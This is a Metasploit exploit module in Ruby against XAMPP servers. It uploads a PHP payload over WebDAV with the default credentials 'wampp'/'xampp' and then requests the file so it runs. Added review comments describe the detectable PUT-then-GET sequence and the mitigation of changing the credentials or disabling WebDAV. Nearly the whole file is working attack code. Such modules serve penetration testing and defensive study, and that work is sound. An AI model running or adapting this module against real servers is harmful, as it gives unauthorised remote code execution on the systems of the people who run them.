metasploit-framework/modules/exploits/windows/http/xampp_webdav_upload_php.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit remote exploit module for XAMPP's WebDAV share.
#
# Flow implemented below: build a target URI under PATH, PUT the PHP payload
# to it with the configured HTTP credentials, then GET the same URI so the
# web server runs the uploaded file.
#
# Review notes grounded in this file:
# * USERNAME/PASSWORD default to 'wampp'/'xampp', and the module description
#   attributes the exposure to weak WebDAV passwords on XAMPP. Changing those
#   credentials or disabling WebDAV removes the precondition the module
#   depends on.
# * Observable sequence: a PUT carrying HTTP credentials for a `.php` file
#   under PATH (default '/webdav/') answered with 201, followed by a GET for
#   the same URI.
# * Nothing in this class removes the uploaded file afterwards.
class Metasploit3 < Msf::Exploit::Remote
  # Framework ranking constant for this module.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): no call in this file visibly uses the EXE mixin.
  include Msf::Exploit::EXE

  # Declares the module metadata and its four datastore options.
  #
  # PATH is the only required option. FILENAME is optional and has no default;
  # USERNAME and PASSWORD are optional and default to 'wampp' / 'xampp'.
  def initialize
    summary = "\nThis module exploits weak WebDAV passwords on XAMPP servers.\n" \
              "It uses supplied credentials to upload a PHP payload and\n" \
              "execute it.\n"

    super(
      'Name' => 'XAMPP WebDAV PHP Upload',
      'Description' => summary,
      'Author' => ['theLightCosine'],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      'DisclosureDate' => 'Jan 14 2012',
      'DefaultTarget' => 0
    )

    webdav_options = [
      OptString.new('PATH', [true, "The path to attempt to upload", '/webdav/']),
      OptString.new('FILENAME', [false, "The filename to give the payload. (Leave Blank for Random)"]),
      OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
      OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
    ]
    register_options(webdav_options, self.class)
  end

  # Uploads the payload over WebDAV and then requests it.
  #
  # Only a 201 response to the PUT is treated as success; any other status, or
  # no response at all, prints an error and stops before the GET is sent.
  #
  # @return [Object, nil] nil when the upload is rejected, otherwise whatever
  #   the final send_request_cgi call returns
  def exploit
    upload_uri = build_path

    print_status "Uploading Payload to #{upload_uri}"
    put_request = {
      'uri' => upload_uri,
      'method' => 'PUT',
      'data' => payload.raw,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }
    # Second argument is the timeout handed to send_request_cgi.
    put_response = send_request_cgi(put_request, 25)

    if !put_response || put_response.code != 201
      print_error "Failed to upload file!"
      return
    end

    print_status "Attempting to execute Payload"
    # The GET carries no credentials; it is the last expression, so its result
    # is what the method returns.
    send_request_cgi({ 'uri' => upload_uri, 'method' => 'GET' }, 20)
  end

  # Builds the URI the payload is written to and later fetched from.
  #
  # The directory part is PATH, normalized and forced to end in '/'. The file
  # part is FILENAME when that option is set, with '.php' appended unless
  # already present, or else seven random alphanumeric characters followed by
  # '.php'.
  #
  # @return [String] the upload URI, always ending in '.php'
  def build_path
    path = normalize_uri(datastore['PATH'])
    path << '/' unless path.end_with?('/')

    chosen_name = datastore['FILENAME']
    if chosen_name
      path << chosen_name
      path << '.php' unless path.end_with?('.php')
    else
      path << Rex::Text.rand_text_alphanumeric(7) << '.php'
    end

    path
  end
end